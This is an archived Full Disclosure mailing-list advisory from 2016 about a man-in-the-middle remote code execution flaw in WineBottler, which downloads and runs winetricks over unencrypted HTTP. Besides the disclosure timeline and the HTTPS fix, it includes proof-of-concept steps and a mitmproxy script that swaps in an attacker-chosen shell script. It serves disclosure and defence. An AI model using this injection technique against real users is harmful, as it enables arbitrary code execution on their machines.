[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles
From: Bogner Florian <Florian.Bogner () kapsch ! net>
Date: 2016-10-17 9:36:54
Message-ID: C15A16F0-1346-4919-AB0F-63A1F747E1DA () kapsch ! net
[Download RAW message or body]
[Attachment #2 (text/plain)]
Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles
Metadata
===================================================
Release Date: 17-10-2016
Author: Florian Bogner // Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected product: WineBottler (http://winebottler.kronenberg.org/)
Affected versions: up to the still current version 1.8-rc4
Tested on: OS X El Capitan 10.11.6
CVE : product not covered
URL: https://bogner.sh/2016/10/man-in-the-middle-remote-code-execution-vulnerability-in-winebottler-and-its-bundles/
Video: https://youtu.be/nwcZIn2s6Vc
Vulnerability Status: No patch available - Developer became unresponsive after promising to fix \
the issue
Product Description
===================================================
WineBottler packages Windows-based programs like browsers, media-players, games or business \
applications snugly into Mac app-bundles.
Vulnerability Description
===================================================
Whenever WineBottler is launched it tries to update the bundled winetricks \
(https://github.com/Winetricks/winetricks) library. However, as this update is carried out over \
unencrypted HTTP an attacker with man-in-the-middle capabilities can replace the downloaded \
winetricks.sh shell script. As the script is also launched immediately after downloading, this \
is a reliable man in the middle remote code execution vulnerability.
The issue also affects all the bundles created with WineBottler. However, I think it can only \
be abused on their first launch. This greatly limits the attack surfe.
PoC
===================================================
1.) Setup an HTTP proxy like Burp (https://portswigger.net/burp/)
2.) Redirect all HTTP traffic to this proxy
3.) Launch WineBottler
4.) Modify the request to http://winetricks.org/winetricks so that it returns a valid shell \
script. 5.) Remote code execution has been gained!
The following mitmproxy (https://mitmproxy.org/index.html) script "drunken-winebottler.py" can \
be used to automate the attack: from mitmproxy.models import decoded
NEWLINE = '\r\n'
def response(context, flow):
if flow.request.url == "http://winetricks.org/winetricks" and flow.response.status_code == \
301 and flow.request.method=="GET": flow.response.status_code=200 # overwrite 301 status code \
to 200
with decoded(flow.response): # automatically decode gzipped responses.
flow.response.content = "" # replace original script to launch Calculator.app
flow.response.content += '#!/bin/sh'+NEWLINE
flow.response.content += '/usr/bin/open /Applications/Calculator.app'
Disclosure Timeline
===================================================
29.5.2016: The issue has been discovered
30.5.2016: Tried to establish initial contact with the developer using Facebook
31.5.2016: Requested CVE number; Retried to contact developer using Facebook
1.6.2016: MITRE declined CVE: The product is not covered.
2.6.2016: Created this documentation; Sent to developer using mail
18.6.2016: Developer responded on Facebook
20.6.2016: Developer promised that Winetricks update will be switched to HTTPS. Agreed on the \
29.7. for the public disclosure
25.7.2016: Tried to contact developer as no new version has been released – no success
29.7.2016: Initially agreed public disclosure date – rescheduled
31.7.2016: Tried again to contact developer – again no success.
13.8.2016: Tried a last time to get in touch with the developer – again no success
17.10.2016: Public disclosure altough unfixed: Developer unresponsive since several month
Suggested Solution
===================================================
All request should be carried out over encrypted communication channels like HTTPS. The author \
already mentioned (https://mike.kronenberg.org/winebottler-1-7-52/) that he is planing to do so \
in the future. Yet, right now there is no patch available.
The only workaround would be to block outgoing (HTTP) connections - However, whenever I tried \
that WineBottler stalled...
Florian Bogner | Security Solutions
ICT Technology Solutions
Telefon Mobil +43 664 628 5491 | florian.bogner@kapsch.net<mailto:florian.bogner@kapsch.net>
Kapsch BusinessCom AG | Wienerbergstrasse 53 | 1120 Wien | Österreich
www.kapschbusiness.com<http://www.kapschbusiness.com/> | www.kapsch.net
Firmenbuch HG Wien FN 178368g | Firmensitz Wien
<http://www.kapschbusiness.com/>
<http://www.kapsch.net/kbc/Events/EventItems/Kapsch-Security-Day-2016>[cid:image001.jpg@01D0CDEE.D0D64C00]
<http://www.kapschbusiness.com/>
<http://www.kapschbusiness.com/>
The information contained in this e-mail message is privileged and confidential and is for the \
exclusive use of the addressee. The person who receives this message and who is not the \
addressee, one of his employees or an agent entitled to hand it over to the addressee, is \
informed that he may not use, disclose or reproduce the contents thereof, and is kindly asked \
to notify the sender and delete the e-mail immediately.
["image001.jpg" (image/jpeg)]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
--===============7489758764449168600==--
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic